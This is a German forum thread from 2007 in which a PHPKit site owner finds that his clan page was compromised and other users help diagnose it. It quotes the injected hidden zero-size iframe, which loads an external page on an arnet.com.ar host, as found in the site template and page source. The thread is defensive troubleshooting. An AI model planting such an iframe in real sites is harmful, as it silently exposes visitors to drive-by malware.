HTH-C.com - Forum
Latest News Latest Threads
Neuerung: Persönliche Galerie
Informationen zur Übernahme der Erweite..
HTH Blog - Version 2.0
#HTH.Systems - Betatester gesucht
Neueröffnung - PHPKit-Award.de
HTH Webchat v3
Letzter Beitrag Happy Birthday Bottyline Weiblicher Benutzer Heute, 0:00 Zeit der letzten Antwort
Letzter Beitrag Herzlich Willkommen Botty Männlicher Benutzer 22.11.2024 - 20:45 Zeit der letzten Antwort
Letzter Beitrag Gibt es eigentlich noch jemand der PHPki.. Dooki Männlicher Benutzer 16.07.2024 - 19:47 Zeit der letzten Antwort
Letzter Beitrag PHPKit 1.6.6 WEBI Männlicher Benutzer 24.06.2024 - 12:58 Zeit der letzten Antwort
Letzter Beitrag PHPKit 1.6.6 ohne ASCE auf PHP8x Myrddin Männlicher Benutzer 22.03.2023 - 12:36 Zeit der letzten Antwort
 55.471 Posts & 4.945 Themen in 78 Foren
Forenübersicht » Support / Hilfe » PHPKit 1.6.03 & 1.6.1 » Support » In der Taskbar komische Adress..

In der Taskbar komische Adresse
8 Beiträge in diesem Thema
 Seiten (1):    1  
10.09.2007 - 15:24 Uhr
Beitrag: #1
Hallo

Wenn ich meine Clanpage aufrufe steht in der Taskbar einen Moment eine komische Adresse.

Clanpage .

Da steht

1
2
3

Quellcode

http://usarios.arnet.com.ar/alvarezluque/morgan.html

Es steht nur einen Moment da aber ich hab garnichts mit solcher Adresse gemein.
Es dauert auch länger bis sie geladen ist.

In den Templates steht nichts was darauf schliessen lässt dass es geh... wurde.

Weiss jemand was das soll??

MFG
Nueschtmanescht

Zum Anfang der Seite
10.09.2007 - 16:04 Uhr
Beitrag: #2
Schau mal in das Template site.htm:

1
2

Quellcode

<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
  <
IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
Habe mir eben deinen Seiten Quelltext angesehen:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

Quellcode

<IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
  <
IFRAME src="http://usuarios.arnet.com.ar/alvarezluque/morgan.html" width="0" height="0" frameborder="0"></iframe>
<
html>
<
head>
<
meta name="author" content="Pierre moonrise Gersöne">
<
meta name="copyight" content="(c) 2002 by moonrise made@phpkit.de">
<
meta name="publisher" content="phpkit der webbaukasten www.phpkit.de"
<
meta name="language" content="de">
<
meta name="generator" content="handmade by moonrise">
<
meta name="Keywords" content="phpkit, php, html, css, style, stylesheet, stylesheets, design, homepage, hp, java, javascript, script, scripte,    guest, guestbook, gast, gästebuch, news, newsletter, free, frei, freeware, kostenlos, umsonst, webbaukasten, web, baukasten, kit, internet, content, management, contentmanagement, community, com, verwaltung, seite, seiten, site, sites, forum, foren, forums    erstellung, design, designs, gestalltung, bau">
<
meta name="description" content="phpkit der webbaukasten Kostenlose PHP scripte, Fragen und Antworten auf allgemeine und spezielle PHP HTML und CSS Fragen, kostenloses Gästebuch, Newssystem, Kommentarsystem, Contentverwaltung">
<
meta name="robots" content="all">
<
meta name="revisit-after" content="2 weeks">

<
link rev="made" content="mailto:webmaster@phpkit.de">
<
style type="text/css">
....
ect
Achte auf die Sicherheit deiner Page, denn da scheint es noch Lücken zu geben, denn wie sonst kommt solch Code dort hinein, das ist derweil eine neue Masche mit diesen Iframes.

mfG

Zum Anfang der Seite
10.09.2007 - 16:46 Uhr
Beitrag: #3
Hmm.. Weshalb soll das den gut sein. Es wird ja nicht auf diese Seite weitergeleitet oder sonst was. Warum dann das ganze? Erhält man damit Daten die ich eintrage oder Passwörter?

MFG

Zum Anfang der Seite
10.09.2007 - 19:58 Uhr
Beitrag: #4
schau mal hier wenn ich drauf gehe meldet sich bei mir mein antivirprog siehe screen.

Zum Screen

@webi du hast da auch einen kleinen fehler wenn man was uploaden will.

zum webi screen

Dieser Beitrag wurde bereits 4 mal editiert, zuletzt von sofix - 10.09.2007 - 20:04 Uhr

Zum Anfang der Seite
11.09.2007 - 07:25 Uhr
Beitrag: #5
Also mal zur Info
der IFrame befindet sich in jeder .php Datei im Root.
Ausserdem noch woanders wo ich sie noch nicht entdeckt habe.

Werd heut abend mal ein Backup aufsetzen.

MFG

Zum Anfang der Seite
11.09.2007 - 12:51 Uhr
Beitrag: #6
Danke für den Hinweis, Problem behoben.  

Zum Anfang der Seite
11.09.2007 - 16:08 Uhr
Beitrag: #7
Zitat
Original geschrieben von sofix

schau mal hier wenn ich drauf gehe meldet sich bei mir mein antivirprog siehe screen.

Zum Screen

Nur mal als kleine Anmerkung. Es handelt sich dabei um einen heuristischen Treffer. Das bedeutet AFAIK erstmal nur, dass die entsprechende Datei auffälligen Code oder ähnliches enthält und potentiell gefährlich sein könnte, jedoch nicht das auch wirklich eine Gefahr von ihr ausgeht.
Und gerade AntiVir scheint da öfter mal Fehlalarm auszulösen, so zumindest meine Erfahrung. Deswegen sowas auch immer ein bisschen mit Vorsicht genießen zwinkern .(bin nun aber beiweitem kein Experte bei dem Thema *klarstell* zwinkern )

Aber das nur nebenbei...Sicher scheint jedenfalls das jemand auf der Betreffenden Seite eingebrochen ist und sicherlich auch irgendein Ziel verfolgt mit dem Einbinden dieses IFrames. Ich kannte das bisher nur im Zusammenhang mit Werbekram oder Trojanern. Aber genaueres dazu findet sich eventuell bei Google!

Grtz

Zum Anfang der Seite
11.09.2007 - 18:11 Uhr
Beitrag: #8
jup weiss auch das antivir öfters mal komische meldungen rausgibt aber ich weiss selber aus erfahrung das es bei mir genauso anfing und war dann leider gezwungen meine page völlig neu aufzusetzen.

und da ich selber dieses prob hatte wollte ich nur mal bescheid geben auch wenn es vielleicht an meinem prog liegt und es eventuell nur eine sinnlose fehlermeldung herraus gegeben hat.

Zum Anfang der Seite
 Seiten (1):    1